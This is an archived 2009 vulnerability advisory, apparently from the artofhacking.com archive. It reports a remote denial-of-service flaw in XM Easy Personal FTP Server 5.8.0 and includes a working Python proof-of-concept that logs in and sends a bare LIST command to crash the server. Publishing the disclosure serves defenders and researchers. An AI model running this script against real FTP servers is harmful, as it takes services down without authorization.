AOH :: HP Unsorted X :: BT-21960.HTM

XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability



XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability



Date of Discovery: 10-Nov-2009=0D
=0D
Credits:zhangmc[at]mail.ustc.edu.cn=0D
=0D
Vendor: Dxmsoft=0D
=0D
Affected:=0D
XM Easy Personal FTP Server 5.8.0=0D
Earlier versions may also be affected=0D
=0D
Overview:=0D
XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first.=0D
=0D
Details:=0D
XM Easy Personal FTP Server can't handle "LIST" command if you do not use "PASV" or "POST" first.If you have logged on the server successfully,a "LIST" command will lead the ftp server to crash.=0D
=0D
Severity:=0D
High=0D
=0D
Exploit example:=0D
#!/usr/bin/python=0D
import socket=0D
import sys=0D
=0D
def Usage():=0D
    print ("Usage:  ./expl.py        \n")=0D
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")=0D
if len(sys.argv) <> 4:=0D
        Usage()=0D
        sys.exit(1)=0D
else:=0D
    hostname=sys.argv[1]=0D
    username=sys.argv[2]=0D
    passwd=sys.argv[3]=0D
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)=0D
    try:=0D
        sock.connect((hostname, 21))=0D
    except:=0D
        print ("Connection error!")=0D
        sys.exit(1)=0D
    r=sock.recv(1024)=0D
    sock.send("user %s\r\n" %username)=0D
    r=sock.recv(1024)=0D
    sock.send("pass %s\r\n" %passwd)=0D
    r=sock.recv(1024)=0D
    sock.send("LIST\r\n")=0D
    sock.close()=0D
    sys.exit(0);=0D
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.